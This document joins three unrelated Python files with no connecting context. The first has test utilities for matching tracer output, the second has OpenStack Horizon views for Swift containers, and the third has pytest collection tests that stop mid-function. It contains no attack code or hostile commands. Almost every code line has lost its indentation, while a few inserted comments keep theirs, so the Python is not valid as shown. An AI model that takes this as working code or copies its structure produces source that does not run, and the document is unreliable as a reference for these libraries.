class _BaseSimpleValueEntry(_BaseValueEntry):
def __init__(self, value=None, value_regex=None, prefix='',
min_python_version=None, max_python_version=None):
_BaseValueEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
if value is not None:
assert value_regex is None
self.value = value
self.value_regex = (None if value_regex is None else
re.compile(value_regex))
def _check_preamble(self, preamble):
return bool(self._preamble_pattern.match(preamble))
def _check_content(self, content):
return self._check_value(content)
def _check_value(self, value):
if self.value is not None:
return value == self.value
elif self.value_regex is not None:
return self.value_regex.match(value)
else:
return True
class ReturnValueEntry(_BaseSimpleValueEntry):
_preamble_pattern = re.compile(
r"""^Return value$"""
)
class ExceptionValueEntry(_BaseSimpleValueEntry):
_preamble_pattern = re.compile(
r"""^Exception$"""
)
class SourcePathEntry(_BaseValueEntry):
def __init__(self, source_path=None, source_path_regex=None, prefix=''):
_BaseValueEntry.__init__(self, prefix=prefix)
if source_path is not None:
assert source_path_regex is None
self.source_path = source_path
self.source_path_regex = (None if source_path_regex is None else
re.compile(source_path_regex))
_preamble_pattern = re.compile(
r"""^Source path$"""
)
def _check_preamble(self, preamble):
return bool(self._preamble_pattern.match(preamble))
def _check_content(self, source_path):
if self.source_path is not None:
return source_path == self.source_path
elif self.source_path_regex is not None:
return self.source_path_regex.match(source_path)
else:
return True
class _BaseEventEntry(_BaseEntry):
def __init__(self, source=None, source_regex=None, thread_info=None,
thread_info_regex=None, prefix='', min_python_version=None,
max_python_version=None):
_BaseEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
if type(self) is _BaseEventEntry:
raise TypeError
if source is not None:
assert source_regex is None
self.line_pattern = re.compile(
r"""^%s(?P<indent>(?: {4})*)(?:(?:[0-9:.]{15})|(?: {15})) """
r"""(?P<thread_info>[0-9]+-[0-9A-Za-z_-]+[ ]+)?"""
r"""(?P<event_name>[a-z_]*) +(?P<line_number>[0-9]*) """
r"""+(?P<source>.*)$""" % (re.escape(self.prefix,))
)
self.source = source
self.source_regex = (None if source_regex is None else
re.compile(source_regex))
self.thread_info = thread_info
self.thread_info_regex = (None if thread_info_regex is None else
re.compile(thread_info_regex))
@property
def event_name(self):
return re.match('^[A-Z][a-z_]*', type(self).__name__).group(0).lower()
def _check_source(self, source):
if self.source is not None:
return source == self.source
elif self.source_regex is not None:
return self.source_regex.match(source)
else:
return True
def _check_thread_info(self, thread_info):
if self.thread_info is not None:
return thread_info == self.thread_info
elif self.thread_info_regex is not None:
return self.thread_info_regex.match(thread_info)
else:
return True
def check(self, s):
match = self.line_pattern.match(s)
if not match:
return False
_, thread_info, event_name, _, source = match.groups()
return (event_name == self.event_name and
self._check_source(source) and
self._check_thread_info(thread_info))
class CallEntry(_BaseEventEntry):
pass
class LineEntry(_BaseEventEntry):
pass
class ReturnEntry(_BaseEventEntry):
pass
class ExceptionEntry(_BaseEventEntry):
pass
class OpcodeEntry(_BaseEventEntry):
pass
class OutputFailure(Exception):
pass
def verify_normalize(lines, prefix):
time_re = re.compile(r"[0-9:.]{15}")
src_re = re.compile(r'^(?: *)Source path:\.\.\. (.*)$')
for line in lines:
if DEFAULT_REPR_RE.search(line):
msg = "normalize is active, memory address should not appear"
raise OutputFailure(line, msg)
no_prefix = line.replace(prefix if prefix else '', '').strip()
if time_re.match(no_prefix):
msg = "normalize is active, time should not appear"
raise OutputFailure(line, msg)
m = src_re.match(line)
if m:
if not os.path.basename(m.group(1)) == m.group(1):
msg = "normalize is active, path should be only basename"
raise OutputFailure(line, msg)
def assert_output(output, expected_entries, prefix=None, normalize=False):
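    # Compare each expected entry against the corresponding output line and
    # raise OutputFailure with an annotated side-by-side report on any mismatch.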
lines = tuple(filter(None, output.split('\n')))
if expected_entries and not lines:
raise OutputFailure("Output is empty")
if prefix is not None:
for line in lines:
if not line.startswith(prefix):
raise OutputFailure(line)
if normalize:
verify_normalize(lines, prefix)
# Filter only entries compatible with the current Python
filtered_expected_entries = []
for expected_entry in expected_entries:
if isinstance(expected_entry, _BaseEntry):
if expected_entry.is_compatible_with_current_python_version():
filtered_expected_entries.append(expected_entry)
else:
filtered_expected_entries.append(expected_entry)
expected_entries_count = len(filtered_expected_entries)
any_mismatch = False
result = ''
template = u'\n{line!s:%s} {expected_entry} {arrow}' % max(map(len, lines))
for expected_entry, line in zip_longest(filtered_expected_entries, lines, fillvalue=""):
mismatch = not (expected_entry and expected_entry.check(line))
any_mismatch |= mismatch
arrow = '<===' * mismatch
result += template.format(**locals())
    if len(lines) != expected_entries_count:
        result += '\nOutput has {} lines, while we expect {} lines.'.format(
            len(lines), expected_entries_count)
if any_mismatch:
raise OutputFailure(result)
def assert_sample_output(module):
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
module.main()
placeholder_time = '00:00:00.000000'
time_pattern = '[0-9:.]{15}'
def normalise(out):
out = re.sub(time_pattern, placeholder_time, out).strip()
out = re.sub(
r'^( *)Source path:\.\.\. .*$',
r'\1Source path:... Whatever',
out,
flags=re.MULTILINE
)
return out
output = output_capturer.string_io.getvalue()
try:
assert (
normalise(output) ==
normalise(module.expected_output)
)
except AssertionError:
print('\n\nActual Output:\n\n' + output) # to copy paste into expected_output
raise # show pytest diff (may need -vv flag to see in full)
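# Illustrative sketch (not part of the original utilities): the *Entry classes
# and assert_output above form a small expectation DSL for line-oriented
# tracer output.  A test would typically use them roughly like this, assuming
# a tracer that emits call/line/return events with the prefix 'ZZZ ':
#
#     expected = (
#         CallEntry('def traced(x):', prefix='ZZZ '),
#         LineEntry('return x + 1', prefix='ZZZ '),
#         ReturnEntry('return x + 1', prefix='ZZZ '),
#     )
#     assert_output(captured_output, expected, prefix='ZZZ ')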
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Swift containers.
"""
import os
from django.core.urlresolvers import reverse
from django import http
from django.utils.functional import cached_property # noqa
from django.utils.translation import ugettext_lazy as _
from django.views import generic
import six
from horizon import browsers
from horizon import exceptions
from horizon import forms
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.api import swift
from openstack_dashboard.dashboards.project.containers \
import browsers as project_browsers
from openstack_dashboard.dashboards.project.containers \
import forms as project_forms
from openstack_dashboard.dashboards.project.containers import utils
class NgIndexView(generic.TemplateView):
template_name = 'project/containers/ngindex.html'
class ContainerView(browsers.ResourceBrowserView):
browser_class = project_browsers.ContainerBrowser
template_name = "project/containers/index.html"
page_title = _("Containers")
def get_containers_data(self):
containers = []
self._more = None
marker = self.request.GET.get('marker', None)
try:
containers, self._more = api.swift.swift_get_containers(
self.request, marker=marker)
except Exception:
msg = _('Unable to retrieve container list.')
exceptions.handle(self.request, msg)
return containers
@cached_property
def objects(self):
"""Returns a list of objects given the subfolder's path.
The path is from the kwargs of the request.
"""
objects = []
self._more = None
marker = self.request.GET.get('marker', None)
container_name = self.kwargs['container_name']
subfolder = self.kwargs['subfolder_path']
prefix = None
if container_name:
self.navigation_selection = True
if subfolder:
prefix = subfolder
try:
objects, self._more = api.swift.swift_get_objects(
self.request,
container_name,
marker=marker,
prefix=prefix)
except Exception:
self._more = None
objects = []
msg = _('Unable to retrieve object list.')
exceptions.handle(self.request, msg)
return objects
def is_subdir(self, item):
content_type = "application/pseudo-folder"
return getattr(item, "content_type", None) == content_type
def is_placeholder(self, item):
object_name = getattr(item, "name", "")
return object_name.endswith(api.swift.FOLDER_DELIMITER)
def get_objects_data(self):
"""Returns a list of objects within the current folder."""
filtered_objects = [item for item in self.objects
if (not self.is_subdir(item) and
not self.is_placeholder(item))]
return filtered_objects
def get_subfolders_data(self):
"""Returns a list of subfolders within the current folder."""
filtered_objects = [item for item in self.objects
if self.is_subdir(item)]
return filtered_objects
def get_context_data(self, **kwargs):
context = super(ContainerView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
context['subfolders'] = []
if self.kwargs["subfolder_path"]:
(parent, slash, folder) = self.kwargs["subfolder_path"] \
.strip('/').rpartition('/')
while folder:
path = "%s%s%s/" % (parent, slash, folder)
context['subfolders'].insert(0, (folder, path))
(parent, slash, folder) = parent.rpartition('/')
return context
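# Worked example of the breadcrumb loop above (hypothetical subfolder path,
# for illustration only): with subfolder_path "media/photos/2019/", the
# successive rpartition('/') calls build context['subfolders'] ==
# [('media', 'media/'), ('photos', 'media/photos/'),
#  ('2019', 'media/photos/2019/')], i.e. the navigation trail from the
# container root down to the current pseudo-folder.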
class CreateView(forms.ModalFormView):
form_class = project_forms.CreateContainer
template_name = 'project/containers/create.html'
success_url = "horizon:project:containers:index"
page_title = _("Create Container")
def get_success_url(self):
parent = self.request.POST.get('parent', None)
if parent:
container, slash, remainder = parent.partition(
swift.FOLDER_DELIMITER)
args = (utils.wrap_delimiter(container),
utils.wrap_delimiter(remainder))
return reverse(self.success_url, args=args)
else:
container = utils.wrap_delimiter(self.request.POST['name'])
return reverse(self.success_url, args=[container])
def get_initial(self):
initial = super(CreateView, self).get_initial()
initial['parent'] = self.kwargs['container_name']
return initial
class CreatePseudoFolderView(forms.ModalFormView):
form_class = project_forms.CreatePseudoFolder
template_name = 'project/containers/create_pseudo_folder.html'
success_url = "horizon:project:containers:index"
page_title = _("Create Pseudo-folder")
def get_success_url(self):
container_name = self.request.POST['container_name']
return reverse(self.success_url,
args=(utils.wrap_delimiter(container_name),
self.request.POST.get('path', '')))
def get_initial(self):
return {"container_name": self.kwargs["container_name"],
"path": self.kwargs['subfolder_path']}
def get_context_data(self, **kwargs):
context = super(CreatePseudoFolderView, self). \
get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
return context
class UploadView(forms.ModalFormView):
form_class = project_forms.UploadObject
template_name = 'project/containers/upload.html'
success_url = "horizon:project:containers:index"
page_title = _("Upload Objects")
def get_success_url(self):
container = utils.wrap_delimiter(self.request.POST['container_name'])
path = utils.wrap_delimiter(self.request.POST.get('path', ''))
args = (container, path)
return reverse(self.success_url, args=args)
def get_initial(self):
return {"container_name": self.kwargs["container_name"],
"path": self.kwargs['subfolder_path']}
def get_context_data(self, **kwargs):
context = super(UploadView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
return context
def object_download(request, container_name, object_path):
try:
obj = api.swift.swift_get_object(request, container_name, object_path,
resp_chunk_size=swift.CHUNK_SIZE)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(request,
_("Unable to retrieve object."),
redirect=redirect)
# Add the original file extension back on if it wasn't preserved in the
# name given to the object.
filename = object_path.rsplit(swift.FOLDER_DELIMITER)[-1]
if not os.path.splitext(obj.name)[1] and obj.orig_name:
name, ext = os.path.splitext(obj.orig_name)
filename = "%s%s" % (filename, ext)
response = http.StreamingHttpResponse(obj.data)
safe_name = filename.replace(",", "")
if six.PY2:
safe_name = safe_name.encode('utf-8')
response['Content-Disposition'] = 'attachment; filename="%s"' % safe_name
response['Content-Type'] = 'application/octet-stream'
response['Content-Length'] = obj.bytes
return response
class CopyView(forms.ModalFormView):
form_class = project_forms.CopyObject
template_name = 'project/containers/copy.html'
success_url = "horizon:project:containers:index"
page_title = _("Copy Object")
def get_success_url(self):
container = utils.wrap_delimiter(
self.request.POST['new_container_name'])
path = utils.wrap_delimiter(self.request.POST.get('path', ''))
args = (container, path)
return reverse(self.success_url, args=args)
def get_form_kwargs(self):
kwargs = super(CopyView, self).get_form_kwargs()
try:
containers = api.swift.swift_get_containers(self.request)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(self.request,
_('Unable to list containers.'),
redirect=redirect)
kwargs['containers'] = [(c.name, c.name) for c in containers[0]]
return kwargs
@staticmethod
def get_copy_name(object_name):
filename, ext = os.path.splitext(object_name)
return "%s.copy%s" % (filename, ext)
def get_initial(self):
path = self.kwargs["subfolder_path"]
object_name = self.kwargs["object_name"]
orig = "%s%s" % (path or '', object_name)
return {"new_container_name": self.kwargs["container_name"],
"orig_container_name": self.kwargs["container_name"],
"orig_object_name": orig,
"path": path,
"new_object_name": self.get_copy_name(object_name)}
def get_context_data(self, **kwargs):
context = super(CopyView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
context['object_name'] = self.kwargs["object_name"]
return context
class ContainerDetailView(forms.ModalFormMixin, generic.TemplateView):
template_name = 'project/containers/container_detail.html'
page_title = _("Container Details")
@memoized.memoized_method
def get_object(self):
try:
return api.swift.swift_get_container(
self.request,
self.kwargs["container_name"],
with_data=False)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(self.request,
_('Unable to retrieve details.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(ContainerDetailView, self).get_context_data(**kwargs)
context['container'] = self.get_object()
return context
class ObjectDetailView(forms.ModalFormMixin, generic.TemplateView):
template_name = 'project/containers/object_detail.html'
page_title = _("Object Details")
@memoized.memoized_method
def get_object(self):
try:
return api.swift.swift_get_object(
self.request,
self.kwargs["container_name"],
self.kwargs["object_path"],
with_data=False)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(self.request,
_('Unable to retrieve details.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(ObjectDetailView, self).get_context_data(**kwargs)
context['object'] = self.get_object()
return context
class UpdateObjectView(forms.ModalFormView):
form_class = project_forms.UpdateObject
template_name = 'project/containers/update.html'
success_url = "horizon:project:containers:index"
page_title = _("Update Object")
def get_success_url(self):
container = utils.wrap_delimiter(self.request.POST['container_name'])
path = utils.wrap_delimiter(self.request.POST.get('path', ''))
args = (container, path)
return reverse(self.success_url, args=args)
def get_initial(self):
return {"container_name": self.kwargs["container_name"],
"path": self.kwargs["subfolder_path"],
"name": self.kwargs["object_name"]}
def get_context_data(self, **kwargs):
context = super(UpdateObjectView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
context['subfolder_path'] = self.kwargs["subfolder_path"]
context['object_name'] = self.kwargs["object_name"]
return context
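# Rough sketch (assumption, not part of this module): these views are exposed
# through the dashboard's urls.py, with URL names matching the
# "horizon:project:containers:*" reverses used above, along the lines of:
#
#     from django.conf.urls import url
#     from openstack_dashboard.dashboards.project.containers import views
#
#     urlpatterns = [
#         url(r'^$', views.ContainerView.as_view(), name='index'),
#         url(r'^create$', views.CreateView.as_view(), name='create'),
#     ]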
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pprint
import sys
import textwrap
import py
import pytest
from _pytest.main import _in_venv
from _pytest.main import EXIT_INTERRUPTED
from _pytest.main import EXIT_NOTESTSCOLLECTED
from _pytest.main import Session
class TestCollector(object):
def test_collect_versus_item(self):
from pytest import Collector, Item
assert not issubclass(Collector, Item)
assert not issubclass(Item, Collector)
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol(
"""
def test_pass(): pass
def test_fail(): assert 0
"""
)
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0 # NOQA
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1, fn2, fn3:
assert fn != 3
assert fn != modcol
assert fn != [1, 2, 3]
assert [1, 2, 3] != fn
assert modcol != fn
def test_getparent(self, testdir):
modcol = testdir.getmodulecol(
"""
class TestClass(object):
def test_foo():
pass
"""
)
cls = testdir.collect_by_name(modcol, "TestClass")
fn = testdir.collect_by_name(testdir.collect_by_name(cls, "()"), "test_foo")
parent = fn.getparent(pytest.Module)
assert parent is modcol
parent = fn.getparent(pytest.Function)
assert parent is fn
parent = fn.getparent(pytest.Class)
assert parent is cls
def test_getcustomfile_roundtrip(self, testdir):
hello = testdir.makefile(".xxx", hello="world")
testdir.makepyfile(
conftest="""
import pytest
class CustomFile(pytest.File):
pass
def pytest_collect_file(path, parent):
if path.ext == ".xxx":
return CustomFile(path, parent=parent)
"""
)
node = testdir.getpathnode(hello)
assert isinstance(node, pytest.File)
assert node.name == "hello.xxx"
nodes = node.session.perform_collect([node.nodeid], genitems=False)
assert len(nodes) == 1
assert isinstance(nodes[0], pytest.File)
def test_can_skip_class_with_test_attr(self, testdir):
"""Assure test class is skipped when using `__test__=False` (See #2007)."""
testdir.makepyfile(
"""
class TestFoo(object):
__test__ = False
def __init__(self):
pass
def test_foo():
assert True
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["collected 0 items", "*no tests ran in*"])
class TestCollectFS(object):
def test_ignored_certain_directories(self, testdir):
tmpdir = testdir.tmpdir
tmpdir.ensure("build", "test_notfound.py")
tmpdir.ensure("dist", "test_notfound.py")
tmpdir.ensure("_darcs", "test_notfound.py")
tmpdir.ensure("CVS", "test_notfound.py")
tmpdir.ensure("{arch}", "test_notfound.py")
tmpdir.ensure(".whatever", "test_notfound.py")
tmpdir.ensure(".bzr", "test_notfound.py")
tmpdir.ensure("normal", "test_found.py")
for x in tmpdir.visit("test_*.py"):
x.write("def test_hello(): pass")
result = testdir.runpytest("--collect-only")
s = result.stdout.str()
assert "test_notfound" not in s
assert "test_found" in s
@pytest.mark.parametrize(
"fname",
(
"activate",
"activate.csh",
"activate.fish",
"Activate",
"Activate.bat",
"Activate.ps1",
),
)
def test_ignored_virtualenvs(self, testdir, fname):
bindir = "Scripts" if sys.platform.startswith("win") else "bin"
testdir.tmpdir.ensure("virtual", bindir, fname)
testfile = testdir.tmpdir.ensure("virtual", "test_invenv.py")
testfile.write("def test_hello(): pass")
# by default, ignore tests inside a virtualenv
result = testdir.runpytest()
assert "test_invenv" not in result.stdout.str()
# allow test collection if user insists
result = testdir.runpytest("--collect-in-virtualenv")
assert "test_invenv" in result.stdout.str()
# allow test collection if user directly passes in the directory
result = testdir.runpytest("virtual")
assert "test_invenv" in result.stdout.str()
@pytest.mark.parametrize(
"fname",
(
"activate",
"activate.csh",
"activate.fish",
"Activate",
"Activate.bat",
"Activate.ps1",
),
)
def test_ignored_virtualenvs_norecursedirs_precedence(self, testdir, fname):
bindir = "Scripts" if sys.platform.startswith("win") else "bin"
# norecursedirs takes priority
testdir.tmpdir.ensure(".virtual", bindir, fname)
testfile = testdir.tmpdir.ensure(".virtual", "test_invenv.py")
testfile.write("def test_hello(): pass")
result = testdir.runpytest("--collect-in-virtualenv")
assert "test_invenv" not in result.stdout.str()
# ...unless the virtualenv is explicitly given on the CLI
result = testdir.runpytest("--collect-in-virtualenv", ".virtual")
assert "test_invenv" in result.stdout.str()
@pytest.mark.parametrize(
"fname",
(
"activate",
"activate.csh",
"activate.fish",
"Activate",
"Activate.bat",
"Activate.ps1",
),
)
def test__in_venv(self, testdir, fname):
"""Directly test the virtual env detection function"""
bindir = "Scripts" if sys.platform.startswith("win") else "bin"
# no bin/activate, not a virtualenv
base_path = testdir.tmpdir.mkdir("venv")
assert _in_venv(base_path) is False
# with bin/activate, totally a virtualenv
base_path.ensure(bindir, fname)
assert _in_venv(base_path) is True
def test_custom_norecursedirs(self, testdir):
testdir.makeini(
"""
[pytest]
norecursedirs = mydir xyz*
"""
)
tmpdir = testdir.tmpdir
tmpdir.ensure("mydir", "test_hello.py").write("def test_1(): pass")
tmpdir.ensure("xyz123", "test_2.py").write("def test_2(): 0/0")
tmpdir.ensure("xy", "test_ok.py").write("def test_3(): pass")
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
rec = testdir.inline_run("xyz123/test_2.py")
rec.assertoutcome(failed=1)
def test_testpaths_ini(self, testdir, monkeypatch):
testdir.makeini(
"""
[pytest]
testpaths = gui uts
"""
)
tmpdir = testdir.tmpdir
tmpdir.ensure("env", "test_1.py").write("def test_env(): pass")
tmpdir.ensure("gui", "test_2.py").write("def test_gui(): pass")
tmpdir.ensure("uts", "test_3.py").write("def test_uts(): pass")
# executing from rootdir only tests from `testpaths` directories
# are collected
items, reprec = testdir.inline_genitems("-v")
assert [x.name for x in items] == ["test_gui", "test_uts"]
# check that explicitly passing directories in the command-line
# collects the tests
for dirname in ("env", "gui", "uts"):
items, reprec = testdir.inline_genitems(tmpdir.join(dirname))
assert [x.name for x in items] == ["test_%s" % dirname]
# changing cwd to each subdirectory and running pytest without
# arguments collects the tests in that directory normally
for dirname in ("env", "gui", "uts"):
monkeypatch.chdir(testdir.tmpdir.join(dirname))
items, reprec = testdir.inline_genitems()
assert [x.name for x in items] == ["test_%s" % dirname]
class TestCollectPluginHookRelay(object):
def test_pytest_collect_file(self, testdir):
wascalled = []
class Plugin(object):
def pytest_collect_file(self, path, parent):
if not path.basename.startswith("."):
# Ignore hidden files, e.g. .testmondata.
wascalled.append(path)
testdir.makefile(".abc", "xyz")
pytest.main([testdir.tmpdir], plugins=[Plugin()])
assert len(wascalled) == 1
assert wascalled[0].ext == ".abc"
def test_pytest_collect_directory(self, testdir):
wascalled = []
class Plugin(object):
def pytest_collect_directory(self, path, parent):
wascalled.append(path.basename)
testdir.mkdir("hello")
testdir.mkdir("world")
pytest.main(testdir.tmpdir, plugins=[Plugin()])
assert "hello" in wascalled
assert "world" in wascalled
class TestPrunetraceback(object):
def test_custom_repr_failure(self, testdir):
p = testdir.makepyfile(
"""
import not_exists
"""
)
testdir.makeconftest(
"""
import pytest
def pytest_collect_file(path, parent):
return MyFile(path, parent)
class MyError(Exception):
pass
class MyFile(pytest.File):
def collect(self):
raise MyError()
def repr_failure(self, excinfo):
if excinfo.errisinstance(MyError):
return "hello world"
return pytest.File.repr_failure(self, excinfo)
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*ERROR collecting*", "*hello world*"])
@pytest.mark.xfail(reason="other mechanism for adding to reporting needed")
def test_collect_report_postprocessing(self, testdir):
p = testdir.makepyfile(
"""
import not_exists
"""
)
testdir.makeconftest(
"""
import pytest
@pytest.hookimpl(hookwrapper=True)
def pytest_make_collect_report():
outcome = yield
rep = outcome.get_result()
rep.headerlines += ["header1"]
outcome.force_result(rep)
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*ERROR collecting*", "*header1*"])
class TestCustomConftests(object):
def test_ignore_collect_path(self, testdir):
testdir.makeconftest(
"""
def pytest_ignore_collect(path, config):
return path.basename.startswith("x") or \
path.basename == "test_one.py"
"""
)
sub = testdir.mkdir("xy123")
sub.ensure("test_hello.py").write("syntax error")
sub.join("conftest.py").write("syntax error")
testdir.makepyfile("def test_hello(): pass")
testdir.makepyfile(test_one="syntax error")
result = testdir.runpytest("--fulltrace")
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
def test_ignore_collect_not_called_on_argument(self, testdir):
testdir.makeconftest(
"""
def pytest_ignore_collect(path, config):
return True
"""
)
p = testdir.makepyfile("def test_hello(): pass")
result = testdir.runpytest(p)
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stdout.fnmatch_lines(["*collected 0 items*"])
def test_collectignore_exclude_on_option(self, testdir):
testdir.makeconftest(
"""
collect_ignore = ['hello', 'test_world.py']
def pytest_addoption(parser):
parser.addoption("--XX", action="store_true", default=False)
def pytest_configure(config):
if config.getvalue("XX"):
collect_ignore[:] = []
"""
)
testdir.mkdir("hello")
testdir.makepyfile(test_world="def test_hello(): pass")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
assert "passed" not in result.stdout.str()
result = testdir.runpytest("--XX")
assert result.ret == 0
assert "passed" in result.stdout.str()
def test_collectignoreglob_exclude_on_option(self, testdir):
testdir.makeconftest(
"""
collect_ignore_glob = ['*w*l[dt]*']
def pytest_addoption(parser):
parser.addoption("--XX", action="store_true", default=False)
def pytest_configure(config):
if config.getvalue("XX"):
collect_ignore_glob[:] = []
"""
)
testdir.makepyfile(test_world="def test_hello(): pass")
testdir.makepyfile(test_welt="def test_hallo(): pass")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stdout.fnmatch_lines(["*collected 0 items*"])
result = testdir.runpytest("--XX")
assert result.ret == 0
result.stdout.fnmatch_lines(["*2 passed*"])
def test_pytest_fs_collect_hooks_are_seen(self, testdir):
testdir.makeconftest(
"""
import pytest
class MyModule(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule(path, parent)
"""
)
testdir.mkdir("sub")
testdir.makepyfile("def test_x(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*MyModule*", "*test_x*"])
def test_pytest_collect_file_from_sister_dir(self, testdir):
sub1 = testdir.mkpydir("sub1")
sub2 = testdir.mkpydir("sub2")
conf1 = testdir.makeconftest(
"""
import pytest
class MyModule1(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule1(path, parent)
"""
)
conf1.move(sub1.join(conf1.basename))
conf2 = testdir.makeconftest(
"""
import pytest
class MyModule2(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule2(path, parent)
"""
)
conf2.move(sub2.join(conf2.basename))
p = testdir.makepyfile("def test_x(): pass")
p.copy(sub1.join(p.basename))
p.copy(sub2.join(p.basename))
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*MyModule1*", "*MyModule2*", "*test_x*"])
class TestSession(object):
def test_parsearg(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
subdir = testdir.mkdir("sub")
subdir.ensure("__init__.py")
target = subdir.join(p.basename)
p.move(target)
subdir.chdir()
config = testdir.parseconfig(p.basename)
rcol = Session(config=config)
assert rcol.fspath == subdir
parts = rcol._parsearg(p.basename)
assert parts[0] == target
assert len(parts) == 1
parts = rcol._parsearg(p.basename + "::test_func")
assert parts[0] == target
assert parts[1] == "test_func"
assert len(parts) == 2
def test_collect_topdir(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
# XXX migrate to collectonly? (see below)
config = testdir.parseconfig(id)
topdir = testdir.tmpdir
rcol = Session(config)
assert topdir == rcol.fspath
# rootid = rcol.nodeid
# root2 = rcol.perform_collect([rcol.nodeid], genitems=False)[0]
# assert root2 == rcol, rootid
colitems = rcol.perform_collect([rcol.nodeid], genitems=False)
assert len(colitems) == 1
assert colitems[0].fspath == p
def get_reported_items(self, hookrec):
"""Return pytest.Item instances reported by the pytest_collectreport hook"""
calls = hookrec.getcalls("pytest_collectreport")
return [
x
for call in calls
for x in call.report.result
if isinstance(x, pytest.Item)
]
def test_collect_protocol_single_function(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
items, hookrec = testdir.inline_genitems(id)
(item,) = items
assert item.name == "test_func"
newid = item.nodeid
assert newid == id
pprint.pprint(hookrec.calls)
topdir = testdir.tmpdir # noqa
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == topdir"),
("pytest_make_collect_report", "collector.fspath == topdir"),
("pytest_collectstart", "collector.fspath == p"),
("pytest_make_collect_report", "collector.fspath == p"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.result[0].name == 'test_func'"),
]
)
# ensure we are reporting the collection of the single test item (#2464)
assert [x.name for x in self.get_reported_items(hookrec)] == ["test_func"]
def test_collect_protocol_method(self, testdir):
p = testdir.makepyfile(
"""
class TestClass(object):
def test_method(self):
pass
"""
)
normid = p.basename + "::TestClass::test_method"
for id in [p.basename, p.basename + "::TestClass", normid]:
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 1
assert items[0].name == "test_method"
newid = items[0].nodeid
assert newid == normid
# ensure we are reporting the collection of the single test item (#2464)
assert [x.name for x in self.get_reported_items(hookrec)] == ["test_method"]
def test_collect_custom_nodes_multi_id(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
testdir.makeconftest(
"""
import pytest
class SpecialItem(pytest.Item):
def runtest(self):
return # ok
class SpecialFile(pytest.File):
def collect(self):
return [SpecialItem(name="check", parent=self)]
def pytest_collect_file(path, parent):
if path.basename == %r:
return SpecialFile(fspath=path, parent=parent)
"""
% p.basename
)
id = p.basename
items, hookrec = testdir.inline_genitems(id)
pprint.pprint(hookrec.calls)
assert len(items) == 2
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == collector.session.fspath"),
(
"pytest_collectstart",
"collector.__class__.__name__ == 'SpecialFile'",
),
("pytest_collectstart", "collector.__class__.__name__ == 'Module'"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith(p.basename)"),
]
)
assert len(self.get_reported_items(hookrec)) == 2
def test_collect_subdir_event_ordering(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
aaa = testdir.mkpydir("aaa")
test_aaa = aaa.join("test_aaa.py")
p.move(test_aaa)
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
pprint.pprint(hookrec.calls)
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith('aaa/test_aaa.py')"),
]
)
def test_collect_two_commandline_args(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
